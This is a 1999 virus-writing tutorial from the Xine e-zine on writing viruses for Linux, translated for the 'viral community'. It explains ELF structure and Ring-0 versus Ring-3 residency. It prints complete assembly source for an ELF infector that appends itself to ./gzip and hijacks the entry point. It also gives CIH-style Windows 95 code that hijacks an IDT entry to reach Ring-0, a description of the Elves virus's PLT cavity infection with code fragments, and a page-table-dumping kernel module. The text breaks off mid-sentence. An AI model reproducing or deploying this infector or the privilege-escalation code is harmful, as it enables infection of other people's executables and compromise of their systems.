ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Xine - issue #5 - Phile 105 ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Viruses under LiNUX ============================================================================ Index ~~~~~ 1. Introduction 1.1 Foreword by Billy Belcebu 1.2 Original Author Introduction 2. ELF Infection 3. Resident viruses 3.1 Global residency in Ring-0 3.2 Global residency in Ring-3 3.3 PerProcess residency NOTE: This article was made using kernel version 2.0.34, where the segment distribution is different from the actual kernel versions like 2.2.XX. Introduction ------------ 1. Foreword by Billy Belcebu ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Hi, and welcome to the worlds' first ever Virus Writing Guide alike for the LiNUX system. This tutorial is NOT written by me, and my only intention is to translate it to all the viral community in general. If you want to take a look to the original version (that is in spanish) you can find it on my own website (http://beautifulpeople.cjb.net). The author, who wants to remain anonymous, has shown impressive LiNUX skills and aswell a good assembler level (rare for a LiNUX coder), but he has a problem with his lack of optimization ;) My conclussions after reading this article are various: LiNUX kicks ass, LiNUX kicks Windoze's ass... You can take a look to its heavy and very intelligent protection: It's almost impossible to achieve Ring-0 (at least not being root), it's impossible to make a Ring-3 global residence (with the impressive mechanism of copy-on-write), and all those details that makes the LiNUX system to be the best choice actually in matter of operative sys- tems. Really. My english is not very good, but seems that i'm the only one that wants to take the trouble to translate this. Besides, i think that leave this jewel only in spanish is an unforgivable sin. So, here i am, translating it 4 u ;) Enjoy! (c) 1999 Mr Anonymous [ Original Article ] (c) 1999 Billy Belcebu/iKX [ Translation ] PS: I have the author permission for this. Don't blame me with copyrightz... 2. Introduction: Memory protection ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The neverending question, Why aren't viruses for linux?. It seems that the viral community, accustomed to Real Mode systems (DOS), find that is hard to adapt themselves to protected mode systems. Even for Win95/98, systems with important dessign problems, there exists moreless 30 viruses where the great majority are non-resident viruses or VxD infectors (Ring-0 devices). It seems that the answer is in the important memory protection implemented by Linux. Systems like Win95/NT use a memory dessign with a limited use of segments. In this systems with user and kernel selectors, we can directionate all the virtual space, i.e. from 0x00000000 to 0xFFFFFFFF (That doesn't means that you can write to all the memory, because the memory pages also have some protection attributes). However in Linux the dessign is very different, there are two different zones very differenced by segmentation, one dedicated to user processes, that go from 0x00000000 to 0xC0000000 and other for the kernel, that go from 0xC0000000 to 0xFFFFFFFF. Let's see a dump of registers with GDB, taken from the beginning of the execution of a command like GZIP. (gdb)info registers eax 0x0 0 ecx 0x1 1 edx 0x0 0 ebx 0x0 0 ebp 0xbffffd8c 0xbffffd8c esi 0xbffffd9c 0xbffffd9c edi 0x4000623c 1073766972 eip 0x8048b10 0x8048b10 eflags 0x296 662 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x2b 43 gs 0x2b 43 We can see that Linux uses the selector 0x23 for code, and the selector 0x2B for the data. Intel uses 16-bit selectors, the two less significan bits store the RPL (information about the privilege level of that selector, Intel implements 4 protection rings, but the actual operative systems like Win95/NT or Linux use only 2, Ring-0 for the kernel (maximum privilege level) and Ring-3 for the user processes)). The next bit shows where is the descriptor of the segment that contains information about the segment, 0 for the GDT (GLOBAL DESCRIPTOR TABLE) or 1 for the LDT (LOCAL DESCRIPTOR TABLE). The other bits are simply an index of a segment descriptor that will be in the LDT or the GDT according to the information of below. Selector [ 14 bits, Index to descriptor ] [ 1 bit, GDT/LDT ] [ 2 bits, RPL ] Then, if we pass to binary 0x23 we got [ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 ] [ 0 ] [ 1 1 ] So we know that it is a Ring-3 selector (it's used by a process) and also we know that tge information of such segment lies in the GDT, at 4th entry. If we analyze the next descriptor (0x2B) we'll obtain a similar information, but the descriptor will be at 5th entry. If we take a look to the kernel's code, more concretly in the file called /usr/src/linux/arch/i386/kernel/head.S (painfully in assembler :)) we can appreciate the segment initialization in linux. /* * This gdt setup gives the kernel a 1GB address space at virtual * address 0xC0000000 - space enough for expansion, I hope. */ ENTRY(gdt) .quad 0x0000000000000000 /* NULL descriptor */ .quad 0x0000000000000000 /* not used */ .quad 0xc0c39a000000ffff /* 0x10 kernel 1GB code at 0xC0000000 */ .quad 0xc0c392000000ffff /* 0x18 kernel 1GB data at 0xC0000000 */ .quad 0x00cbfa000000ffff /* 0x23 user 3GB code at 0x00000000 */ .quad 0x00cbf2000000ffff /* 0x2b user 3GB data at 0x00000000 */ .quad 0x0000000000000000 /* not used */ .quad 0x0000000000000000 /* not used */ .fill 2*NR_TASKS,8,0 /* space for LDT's and TSS's etc */ #ifdef CONFIG_APM .quad 0x00c09a0000000000 /* APM CS code */ .quad 0x00809a0000000000 /* APM CS 16 code (16 bit) */ .quad 0x00c0920000000000 /* APM DS data */ #endif As you can see, Linux initializes 4 segments: 2 for kernel and 2 for user, depending if they are of code or data. In each entry is stored information like the base address of the segment and its limit, if it's resident in memory or not, the kind of segment, if its code is in 16 or 32 bits. Meanwhile there are an user selector in the DS segment, we can't ever handle an address over 0xC0000000 because we would be out of the memory that can be accessed by the segment, we would receive a SIGSEGV signal and our process would be finished painfully. I know i can directionate from 0x00000000 to 0xC0000000 but, what can i modify?. Here begins the real protection mechanism. The memory is divided in pages of 4Kb each one in the case of Intel, and each page has its own attributes: if they are read/write, if it's in memory (it can be at disk temporally), if it's of kernel, etc. All the information about pages in memory is located in a page table that contains descriptors for each mapped page in memory. There is one page table for each process in memory, this makes that each process has its own virtual space and besides, that any other process could access to another one. This makes possible to load programs in the same memory address, and really it's what it does. Windows 95/98 and Linux do it. In Linux the usual load address is 0x08040000 while in Windows it is 0x00400000. This page table is pointed by a control register of the processor (the CR3) so it changes with each change of context modifying also the virtual space of the process. But then, if a process can only handle directionate the perprocess memory, how is it able to execute system calls that reside over 0xC0000000? Intel brings us mechanisms for jump to Ring-0 in a safe way when we need to make system calls. Intel uses two methods: the TRAP GATES and the CALL GATES. Usually are used the TRAP GATES (WinNT/98/95, Linux); even i believe that some other unix systems use the CALL GATES for make the Ring jump. The Trap Gates occupy one entry in the IDT (INTERRUPT DESCRIPTOR TABLE), and allow the jump to Ring-0 with the generation of one interrupt. For that, the jump address defined in the IDT must have a Ring-0 selector and the DPL (Descriptor Privilege Level) must be 3, allowing an user to execute it. In Linux the interrupt used for the jump is the 0x80, while Win95 uses the int 0x30, for example. Let's see the disassembly of the getpid function of the LIBC library. For that we create a C file like this: #include void main() { getpid(); /* I get the PID of the process */ } After compile it, we debug the binary file with GDB: (gdb)disass 0x8048480
: pushl %ebp 0x8048481 : movl %esp,%ebp 0x8048483 : call 0x8048378 0x8048488 : movl %ebp,%esp 0x804848a : popl %ebp 0x804848b : ret As you can see the call to getpid is dessigned in Linux (and in other systems) as a CALL to a special section inside the binary file (0x8048378). There we could find a jump to the desired library function. This jumps are built in memory by the OS for choose the dynamic links with the libraries. With this, any file could execute exported functions of others, if it's pointed in this way by the information in the ELF header. Let's continue debugging: (gdb)disass getpid 0x40073000 <__getpid>: pushl %ebp 0x40073001 <__getpid+1>: movl %esp,%ebp 0x40073003 <__getpid+3>: pushl %ebx 0x40073004 <__getpid+4>: movl $0x14,%eax 0x40073009 <__getpid+9>: int $0x80 These are the first instructions of the getpid library call. Its work is simple: we are only preparing a jump to Ring-0. If the function would have some parameters, it would have prepared the registers for that parameters before doing the jump to Ring-0. It would have put in EAX the number of function, and it would have called to the int 0x80. As you can see, the code of the libraries is in the PerProcess memory, below 0xC0000000, so it's Ring-3 code and it lacks of privileges for access ports,to privileged memory areas, etc. That's the reason because the libraries are really intermediary between the calls made by the processes and the calls generated via int 0x80 All the system calls that need to jump to Ring-0 will use the int 0x80, and the int 0x80 has only a descriptor, we'll jump always to the same memory address. That makes us to need to put in EAX register the number of the function we want to call to. In Ring-0, the kernel evaluates the value of EAX for know what function if has to satisfy, and according to its value, it would jump to one function or to another using an internal table of pointers to function called sys_call_table. The list of function accedped with the int 0x80 is in the file /usr/include/sys/syscall.h With the execution of an int 0x80 the processor will change the selector of code active. It'll change from the selector 0x23 to 0x10, so we'll pass from directionate from 0x00000000-0xC0000000 to 0xC0000000-0xFFFFFFFF. The next method of jump, rarely used, is based in an entry in the GDT or excepcionally in the LDT. There we'll define what's denominated a CALL GATE, that allows jumps to Rings of more privilege via the instruction CALL FAR or JUMP FAR of assembler. ELF infection ------------- In Linux there are two formats of executables: a.out and ELF; however every executable and library of Linux nowadays use the second format. The ELF format is very powerful, and contains information for handle applications under different processors. It contains information about the processor where the executable was compiled, or if it has to use little endian or big endian. As it is a format of processors in extended mode, besides the information about the physical sections that are in the file, there is some information about how the OS has to map the file in memory. The ELF file has one first part that occupies the first 0x24 bytes of the executable, and contains, among other things, a mark 'ELF' for show us that it is an executable file with ELF format; the kind of processor, the base address (that is the virtual address of the first instruction that will be executed in the file) and after, 2 pointers to 2 tables. The first table pointed is the Program Header (located physically after the ELF header) that contains entries with information about how will be mapped in memoy the file. Each entry will contain the size of each segment in the memory and in the file, also the address of the init of the segment. The next table is the Section Header, and it's just at the end of the file. It'll contain information about each logical section, it'll also contain protection attributes, but this information won't be used for map the code of the file in memory. With the GDB command 'maintenance info sections' we can see the section structure with all the protection attributes of each section. If you take a look at it, you'll realize that all the readonly sections are situated the first ones, and the read/write sections, altogether at the end. This is necessary because the code sections are mapped altogether in memory in consecutive pages by means of an entry in the program header. That's why all the section that share the same protection attributes will be able to share memory pages, meanwhile the sections with different attributes won't be able to do so. With this we avoid the internal fragmentation in the executables, because if every section would have to map separately, the last page of every section would be empty, and many space would be wasted. Also look to the last readonly page doesn't share a page with the first one with readwrite attributes. The dump of this instruction with a command like gzip would be the following: (gdb)maintenance info sections Exec file: '/bin/gzip', file type elf32-i386. 0x080480d4->0x080480e7 at 0x000000d4: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS 0x080480e8->0x08048308 at 0x000000e8: .has ALLOC LOAD READONLY DATA HAS_CONTENTS 0x08048308->0x08048738 at 0x00000308: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS 0x08048738->0x08048956 at 0x00000738: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS 0x08048998->0x08048b08 at 0x00000958: .rel.bss ALLOC LOAD READONLY DATA HAS_CONTENTS 0x08048b10->0x08048b18 at 0x00000b10: .init ALLOC LOAD READONLY CODE HAS_CONTENTS 0x08048b18->0x08048e08 at 0x00000b18: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS 0x08048e10->0x08050dac at 0x00000e10: .text ALLOC LOAD READONLY CODE HAS_CONTENTS 0x08050db0->0x08050db8 at 0x00008db0: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS 0x08050db8->0x08051f25 at 0x00008db8: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS 0x08052f28->0x08053960 at 0x00009f28: .data ALLOC LOAD DATA HAS_CONTENTS 0x08053960->0x08053968 at 0x0000a960: .ctors ALLOC LOAD DATA HAS_CONTENTS 0x08053968->0x08053968 at 0x0000a968: .dtors ALLOC LOAD DATA HAS_CONTENTS 0x08053970->0x08053a34 at 0x0000a970: .got ALLOC LOAD DATA HAS_CONTENTS 0x08053a34->0x08053abc at 0x0000aa34: .dynamic ALLOC LOAD DATA HAS_CONTENTS 0x08053abc->0x080a4078 at 0x0000aabc: .bss ALLOC 0x00000000->0x00000178 at 0x0000aabc: .comment READONLY HAS_CONTENTS 0x00000178->0x000002b8 at 0x0000ac34: .note READONLY HAS_CONTENTS Take a look to that curious jump between .rodata and .data sections caused by all that i exposed before. This command allows you to visialize how will be in memory the program, but its information in not important for its load. We won't even need to modify the section header for insert more executable code in the file. The Program Header is the true informer of the load process. It contains 5 entries, but it's possible to insert more. - The first one loads the program header. - The second one is a reference to an string with the routine and the name of the interpreter that will be the library that will create in memory the image of the process (usually ld-linux-so.1). - The third one loads every readonly sections, all those found in the first entries of the Section Header. - The fourth loads all the read/write sections - The fifth loads the .dynamic section needed for the dynamic link process. So one solution for insert more executable code could be the expanding of the data segment. This is problematic, because if we copy all the viric code to the end of the executable, i.e. just after the section header, and we expand the entry of the Program Header that corresponds with the data segment, the viral code would overwrite one logical section of the archive, the .bss section. As we had seen with the gdb dump, the .bss section is the last one that is part of the space of the process, and contains the ALLOC attribute, however it doesn't contains the LOAD attribute, so it doesn't load data from the file. This is caused by the fact that the .bss section contains uninitialized data (still) by the host code. If the viric code is mapped over that section is not very problematic, because the virus will be executed before the infected host, so after the virus execution, the host wouldn't care about it. This section, at load time, if filled of zeroes, so a bad programming, like suppose an uninitialized variable set to 0, would show the presence of the virus. In any case,the virus can avoid this copying itself to any other memory address, and filling its old position in .bss with zeroes. Another possibility could be to create another entry in the program header, but we would have to shift almost all the archive, and this would take too much infection time. ;**************************************************************************** ; Linux ELF file infection ;**************************************************************************** ; Compile with: ; nasm -f elf hole.asm -o hole.o ; gcc hole.o -o hole [section .text] [global main] hoste: ret main: pusha ; Beginning of the virus ; Push all the parameters call getdelta getdelta: pop ebp sub ebp,getdelta mov eax,125 ; I modify the attributes with lea ebx,[ebp+main] ; mprotect for write in protec- ; ted pages and ebx,0xFFFFF000 ; Round up to pages mov ecx,03000h ; r|w|x attributes mov edx,07h ; We will only need this in int 80h ; the 1st gen, because we'll ; copy us in the data section mov ebx,01h lea ecx,[ebp+texto] mov edx,0Ch ; Show a Hello World with a call sys_write ; write to stdout mov eax,05 lea ebx,[ebp+archivo] ; open file to infect (./gzip) mov ecx,02 ; read/write int 80h mov ebx,eax ; Handle in EBX xor ecx,ecx xor edx,edx ; Go to beginning of file call sys_lseek lea ecx,[ebp+Elf_header] ; Read the ELF header to our mov edx,24h ; variable call sys_read cmp word [ebp+Elf_header+8],0xDEAD ; Check for previous infection jne infectar jmp salir infectar: mov word [ebp+Elf_header+8],0xDEAD ; The mark is on the 2 first ; fill bytes in the ident struc mov ecx,[ebp+e_phoff] ; e_phoff is a ptr to the PH add ecx,8*4*3 ; Obtain 3rd entry of data seg push ecx xor edx,edx call sys_lseek ; Go to that position lea ecx,[ebp+Program_header] ; Read the entry mov edx,8*4 call sys_read add dword [ebp+p_filez],0x2000 ; increase segment size in add dword [ebp+p_memez],0x2000 ; memory and in the file ; The size to add must be superior to the size of the virus, because besides ; copy the virus, we have also to copy the section table, located before ; and it is not mapped into mem by default. It could be shifted (for avoid ; copying it) but for simplycity reasons i don't do that. pop ecx xor edx,edx call sys_lseek ; back to entry position lea ecx,[ebp+Program_header] mov edx,8*4 call sys_write ; Write entry to the file xor ecx,ecx mov edx,02h call sys_lseek ; Go to file end ; EAX = File Size, that will be phisical offset of the virus mov ecx,dword [ebp+oldentry] mov dword [ebp+temp],ecx mov ecx,dword [ebp+e_entry] mov dword [ebp+oldentry],ecx sub eax,dword [ebp+p_offset] add dword [ebp+p_vaddr],eax mov eax,dword [ebp+p_vaddr] ; EAX = New entrypoint mov dword [ebp+e_entry],eax ; These are the calculations of the new entry address, that will point to the ; code of the virus. For calculate the virtual address of the virus in memory ; i move the pointer to the end of the file with lseek, so the EAX register ; will have the phisical size of the file (i.e. the physical position of the ; virus in the file). ; If to that position i substract the physical position of the beginning of ; the data segment, i will have the virus position relative to the beginning ; of the data segment, and if i add to it the virtual address of the segment ; i will obtain the virtual address of the virus in memory. lea ecx,[ebp+main] mov edx,virend-main call sys_write ; Write the virus to the end xor ecx,ecx xor edx,edx call sys_lseek ; Set pointer to beginning of ; the file lea ecx,[ebp+Elf_header] mov edx,24h call sys_write ; Modify header with new EIP mov ecx,dword [ebp+temp] mov dword [ebp+oldentry],ecx salir: mov eax,06 ; Close the file int 80h popa db 068h ; Opcode of a PUSH oldentry: dd hoste ; back to infected program ret sys_read: ; EBX = Must be File Handle mov eax,3 int 80h ret sys_write: ; EBX = Must be File Handle mov eax,4 int 80h ret sys_lseek: ; EBX = Must be File Handle mov eax,19 int 80h ret dir dd main dw 010h archivo db "./gzip",0 ; File to infect datos db 00h temp dd 00h ; Save oldentry temporally ;**************** Data Zone ************************************************* newentry dd 00h ; New virii EIP newfentry dd 00h myvaddr dd 00h texto db 'HELLO WORLD',0h Elf_header: e_ident: db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h e_type: db 00h,00h e_machine: db 00h,00h e_version: db 00h,00h,00h,00h e_entry: db 00h,00h,00h,00h e_phoff: db 00h,00h,00h,00h e_shoff: db 00h,00h,00h,00h e_flags: db 00h,00h,00h,00h e_ehsize: db 00h,00h e_phentsize: db 00h,00h e_phnum: db 00h,00h e_shentsize: db 00h,00h e_shnum: db 00h,00h e_shstrndx: db 00h,00h jur: db 00h,00h,00h,00h Program_header: p_type db 00h,00h,00h,00h p_offset db 00h,00h,00h,00h p_vaddr db 00h,00h,00h,00h p_paddr db 00h,00h,00h,00h p_filez db 00h,00h,00h,00h p_memez db 00h,00h,00h,00h p_flags db 00h,00h,00h,00h p_align db 00h,00h,00h,00h Section_entry: sh_name db 00h,00h,00h,00h sh_type db 01h,00h,00h,00h sh_flags db 03h,00h,00h,00h ;alloc sh_addr db 00h,00h,00h,00h sh_offset db 00h,00h,00h,00h sh_size dd (virend-main)*2 sh_link db 00h,00h,00h,00h sh_info db 00h,00h,00h,00h sh_addralign db 01h,00h,00h,00h sh_entsize db 00h,00h,00h,00h virend: ;**************************************************************************** If we execute this in a directory where is the gzip file, we will obtain the following message in the screen: HELLO WORLD If we execut the gzip, we will obtain this: HELLO WORLDgzip: compressed data not written to a terminal. Use -f to force compression. For help, type:gzip -h As you can see,the viral code is executed before the host, and after that it returns to it the control without any kind of dificulty. However there are other methods that allow the infection without expanding any section of the Program Header. The Staog virus and the Elves virus use alternative methods. Staog, for example, overwrites the entrypoint of the host with the code of the virus, and the overwritten code is copied to the end of the host. The virus, when receives the control at the execution moment, opens the file (for know the name it takes a look in the stack),takes the code of the virus and make a temporal file in the /tmp directory. After doing that, it calls to fork and while an execution thread is executing the viral code of the temporal archive by meand of execve, other execution thread copies that code to the stack of the program and give the control to that code, that will rebuild the code of the host, and return the control to the original entry- point. Elves, however, made by Super of the group 29A, uses a method much more advanced that makes perprocess residency, and avoids that the infected files grow up in size (cavity infection). NOTE: For more information about perprocess residecy and the structure and use of the PLT, take a look to the article of perprocess residency. The method consists in introduce the viral code in the PLT. The PLT is a necessary structure of the executable that allows the dynamic link of the functions. For that it doesn't move the PLT to other part of the executable or anything similar, the viral code overwrites it, but it continues working perfectly. As i will explain in the article about PerProcess residency, there're 2 ways to make a call to a library: by means of the dynamic linker (when we don't know what's the address of the function), or directly with a specific entry for that function in the PLT (when we've already obtained in the GOT the address). After Elves infection, the second method is disabled, and all the calls are made by means of the dynamic linker. The virus overwrites from the second entry, leaving untouched the first one (the one that makes the jump to the dynamic linker). As we can see in the article about PerProcess residency, an entry in the PLT has the following form: jmp *address_of_GOT pushl entry_in_reloc ; Necessary for the D.L. for jmp first_PLT_entry ; know what function needs As you can see, it's not a very optimized code, the first jump would occupy 5 bytes, the push other 5 bytes, and the next jump another 5 bytes, so the entry would have 15 bytes. So the virus is divided in blocks of 15 bytes, and this allows a sequential execution of the code in a normal way, but in the case that we try to make a jump to the beginning of a PLT entry, it would found a jmp previous_PLT_entry codified only with 2 bytes, with the opcodex 0xEB, 0xEE. Let's see an example: virus_start: fake_plt_entry1: pushl %eax pushal call get_delta get_delta: popl %edi enter $Stat_size,$0x0 movl (Pushl+Pushal+Pushl)(%ebp),%eax .byte 0x83 fake_plt_entry2: .byte 0xeb,0xee leal -0x7(%edi),%esi addl -0x4(%eax),%eax subl %esi,%eax shrl %eax movl %eax,(Pushl+Pushal)(%ebp) .byte 0x83 ; If we execute sequentially this code, we will fake_plt_entry3: ; execute the opcodes 0x83,0xEB,0xDE as if it was .byte 0xeb,0xde ; an only one opcode, so we would execute the ; opcode sub ebx,-22 ; But if we make a system call, this jumps to the ; 3rd entry of the PLT. The processor would find ; the opcodes 0xEB,0xDE, that is the opcode of a ; jmp fake_plt_entry2 By means of that, when a jump to any PLT entry is done, the execution thread would find miraculously 0xEB opcodes, that will go making little jumps until the virus_start label. From here, the virus will be execute sequentially garbage opcodes like sub ebx,-22 that really are hiding a jmp PLT_entry, and after trying to infect the first call to each system call, it makes a jump to the first PLT entry, so it jumps to the dynamic linker. I received the source code of this virus for test it, and painfully, in my Linux version it is not functional (Debian 2.0.34). This is because Super, with his needs of optimizing in space the virus, makes the following code for push the reloc entry and avoid to put a push each entry (that would have make him to break the virus in fragments even smaller): ; This is a generic code for push the entry in the reloc section movl (Pushl+Pushal+Pushl)(%ebp),%eax ; in EAX the return value of CALL imm leal -0x7(%edi),%esi ; in ESI the offset to the beginning of PLT addl -0x4(%eax),%eax ; in EAX the value of the immediate subl %esi,%eax ; Substract the two values shrl %eax ; in EAX i will have the reloc entry movl %eax,(Pushl+Pushal)(%ebp) ; Push the new value The dynamic linker need entries in the .reloc.plt section for know what address it needs to resolve. For that, it supposes that the consecutive entries of the PLT will have consecutive entries in the .reloc.plt section, and if fact, that's true. If we take a look to any PLT, the compiler puts in the first PLT a PUSH 0x00, in the second PLT a PUSH 0x08, in the third a PUSH 0x10, and so on. This is not really a problem, the real problem is to suppose that all the calls to the PLT are done with a CALL immediate (being the immediate a 4 bytes value). When we do a CALL in assembler,the processor pushes the return address on the stack (i.e. the address of the next ins- truction of the call). The virus, as we can see, reads from the stack that value, substracts to it a 4 (the size of the immediate) and reads the value pointed by that address (the next code after the call). To that value, it substracts the PLT address, so we obtain the difference of bytes of the PLT entry we've called to, and the beginning of the PLT, and with that value, it obtains the entry value in the reloc section with a simple rotation opcode. This method is okay if we only make calls with the opcode CALL immediate. This might be true, for example in the newest Linux versions,but for example my Linux version makes jumps to the PLT of the host only with the opcode CALL *EBP, also this instruction is not codifies in host's code, it's done by the dynamic linker even before the host takes the control (i still don't know why). Anyway this method is very interesting and useful. Resident Viruses ---------------- 1. Global residency in Ring-0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The resident viruses in Ring-0 are those that achieve maximum privileges in the processor, and already in Ring-0 they hook the system calls made by all the processes of the system. For achieve Ring-0 an user process should try to make various things: it could try to modify the IDT for generate a TRAP GATE, modify the GDT or the LDT for generate a CALL GATE, or even patch code in Ring-0, so as our code would receive the execution thread already in Ring-0. Wihtout any doubt, it seems a hard work, because all those structures are or should be protected by the OS. But in systems like Windows 95, where code like this (used by the CIH virus) allows us to jump to Ring-0 without difficulty: ;**************************************************************************** .586p .model flat,STDCALL extrn ExitProcess:PROC .data idtaddr dd ?,? .code ;************* Start of code for achieve Ring-0 ************* startvirii: sidt qword ptr [idtaddr] ; Obtain limit and address of the IDT mov ebx,dword ptr [idtaddr+2h] ; in EBX the base add ebx,8d*5d ; Modify int 5 cause i'm gonna use its ; IDT entry lea edx,[ring0code] ; in EDX goes the ring0code offset push word ptr [ebx] ; Modify IDT entry offset for make mov word ptr [ebx],dx ; the jump to ring0code when the int shr edx,16d ; 5h is executed push word ptr [ebx+6] mov word ptr [ebx+6],dx int 5h ; Generate the exception mov ebx,dword ptr [idtaddr+2h] ; Resotre entry offset of the IDT add ebx,8d*5h pop word ptr [ebx+6] pop word ptr [ebx] push -1 call ExitProcess ring0code: pushad ; Code executed under Ring-0 popad exit_r0: iretd endvirii: end: end startvirii ;**************************************************************************** What makes possible that this code works in Windows? The answer is simple, firstly Windows can directionate with user selectors the kernel memory, also (and besidess it seems incredible) lacks of protection by pagination in addresses superior to 0xC0000000, that lies, as linux, the code executed in Ring-0. So if we can directionate the IDT memory, and also we can write there, the jump to Ring-0 is easy. In this example we have chosen the int 0x05 because it is already a TRAP GATE in Windows,that's why we only modify the IDT entry and instead jump to the memory address assigned by windows, it would jump to our label ring0code inside the perprocess memory of our process. However,in Linux we can't directionate the user memory with Ring-0 selectors so we couldn't do the jump in case that we could directionate the kernel memory and the pagination protection would be deactivated, the modification of the IDT wouldn't be enough. If we modify the int 0x5 entry of the IDT for generate a TRAP GATE, we wouldn't be able to use the Ring-0 selector of Linux (0x10). In the IDT we would find the address 0x10:ring0code for make the jump, but that address doesn't point to the PerProcess memory; in fact the base address of the 0x10 segment is 0xC0000000, really we would be jumping to the address 0xC0000000+ring0code. Let's see where lies the IDT in Linux. Compile the next code with NASM: [extern puts] [global main] [SECTION .text] main: sidt [datos] ; Put in datos var the IDT address nop sgdt [datos] ; Put in datos var the GDT address nop sldt [datos] ; Put in datos var the LDT address nop ret [SECTION .data] data_ dd 0x0,0x0 Executing this step by step, and reading the value stores in 'data_', we get the following memory dumps. (0x80495ED = address of 'data_' variable): Dump after SIDT (gdb)x/2 0x80495ED 0x80495ed : 0x501007FF 0x0807C180 Dump after SGDT (gdb)x/2 0x80495ED 0x80495ed : 0x6880203F 0x0807C010 Dump after SLDT (gdb)x/2 0x80495ED 0x80495ed : 0x688002Af 0x0807C010 The first and the second assembler opcodes return in the first 16 bits of 'data_' the IDT and the GDT limits respectively, and in the next 32 bits the lineal address of that structures. Meanwhile, the SLDT only returns a selector that points to its descriptor inside the GDT (each LDT must have defined a descriptor in the GDT). So we know that the IDT has as base address 0xC1805010 and its limit is 0x7FF bytes. The GDT will have as base address 0xC0106880 and will have a size of 0x203F bytes. And of the LDT we know that its descriptor is 0x2AF. As we were expecting, the addresses are all above 0xC0000000, so they are well protected from the user-processes. Another way for access the kernel memory could be to map kernel pages below 0xC0000000, but painfully, that is not possible because the page table is mapped above the 0xC0000000 address, so it can't be modified by Ring-3 pro- cesses. Linux maps all the physical memory of your machine parting from the linear address 0xC0000000, or, with another words, the virtual address 0x0 using the kernel segment 0x10. We can build a module for read the CR3 reg, that contains the physical address of the page table, and with that info, visualize the mapped pages. The program would be the following one: /**************************************************************************** Lector de la Tabla de Paginas ***************************************************************************/ /* Format of an entry 31-12 11-9 7 6 5 2 1 0 address OS 4M D A U/S R/W P If p=1 the page is in memory If R/W=0 means that it's readonly If U/S=1 means that the page is an user page If A=1 means that the page have been accessed If D=1 page dirty If 4M=1 it's a 4M page (only for the tdd entry) OS is specific of the operative system */ #include #include #include #include #include #include #include #include #include #include #ifdef MODULE extern void *sys_call_table[]; unsigned long *tpaginas; unsigned long r_cr0; unsigned long r_cr4; /* read some interesting registers */ int init_module(void) { unsigned long *temp; int x,y,z; /* Read the physical address of the page table that is matches with the virtual address */ /* And btw, i read some interesting processor regs like cr0 and cr4 */ /* As we can see, in CR4 is activated the option of 4M pages */ /* And in CR0 the WP bit active :) */ __asm(" movl %cr3,%eax movl %eax,(tpaginas) movl %cr0,%eax movl %eax,(r_cr0) movl %cr4,%eax movl %eax,(r_cr4) "); x=tpaginas+0xc0000000; printk(" The physical and virtual address \n"); printk(" of the page table is : %x\n",tpaginas); printk(" Control Register Cr0: %x\n",r_cr0); printk(" Control Register Cr4: %x\n",r_cr4); for (z=0;z<90000000;z++){} for(x=0x0;x<0x3ff;x++) { if (((unsigned long) *tpaginas & 0x01) == 1) { printk("Entry %x -> %x ",x,(unsigned long) *tpaginas & 0xfffff000); printk(" u/s:%d r/w:%d\n",(((unsigned long) *tpaginas & 0x04)>>2),(((unsigned long) *tpaginas & 0x02)>>1)); printk(" OS:%x ",((unsigned long) *tpaginas &0xffff ) >>9 ); printk(" p:%d\n",((unsigned long) *tpaginas & 0x01)); if ((((unsigned long) *tpaginas & 0x80)>>7)==1) { printk("In the virtual address -> %x",x<<22); printk(" there is a 4M page \n"); for (z=0;z<90000000;z++){}; tpaginas++; continue; }; for (z=0;z<4000000;z++){}; temp=((unsigned long) *tpaginas & 0xfffff000); /* in temp i read the page table address */ if (temp!=0 && ((unsigned long) *tpaginas & 0x1)) { for (y=0;y<0x3ff;y++) { if (((unsigned long) *temp & 0x01) == 1) { printk("Virtual %x -> %x ",(x<<22|y<<12),((unsigned long) *temp & 0xfffff000)); printk(" u/s:%d r/w:%d",(((unsigned long) *temp & 0x04)>>2),(((unsigned long) *temp & 0x02)>>1)); printk(" OS:%x ",((unsigned long) *temp &0xffff ) >>9 ); printk(" p:%d\n",((unsigned long) *temp & 0x01)); }; if (*temp!=0) {for (z=0;z<4000000;z++){}}; /* slow-down */ temp++; }; }; }; tpaginas++; }; } void cleanup_module(void) { } #endif /***************************************************************************/ After the execution of this program we can get the mapped pages in that mo- ment, and the protection attributes of each page. The first page we would see would be the read-only pages of the process being executed in Ring-3 on the address 8040000 with read only attributes and the user bit, the next ones would be the read/write pages of the execu- table, with user attributes too. After, in the 40000000 address we would have the library libc mapped in memory in a similar way: first r/w code, and after, some read only pages. When we arrive to the linear address 0xC0000000 we enter the marvelous world of the core, where is mapped all the physical memory of your PC. If it's Pentium or higher, it will use 4M pages. So, if you have 16 megs of RAM, from the 0xC0000000 address, Linux would use 4 entries in the directory table for map those 16 megs, if it would have 32 it would use 8, etc. This system guides us to make ourselves some questions, like, for example, what would happen if we got 1G of physical memory? In these pages lies the code of the core, aswell as the page table, and surprisingly it lacks of protection via pagination, uses r/w attributes and the user bit for mark the page, so the bad-coded modules that try to overwrite the code of the core would achieve such goal without making any protection fault :) But that's not all, after map all the physical memory of the machine. It maps some 4Kb pages, all with system attributes, all except one, used for store the IDT (interrupt table) that is the only one with read-only attributes and the S bit, so any bad-coded module that could try to over- write it, wouldn't achieve that, and would die by a protection fault, and the system would remain stable. The fact that any Ring-0 process is not able to modify a read-only page is handled by the WP bit of the control register CR4. If that bit is set to 1, then all the Ring-0 processes won't be able to write in read only pages, neither user, neither kernel. If that bit is set to 0, the memory protection works like a 386 and a Ring-0 process can do whatever it wants to, being able to modify all mapped pages, no matter of their protection attributes. So, if a Linux module wants to modify the IDT, will firstly have to deact- ivate the WP bit of the CR4 reg for be able to write, or modify the page attributes of that page in the page table. Because all 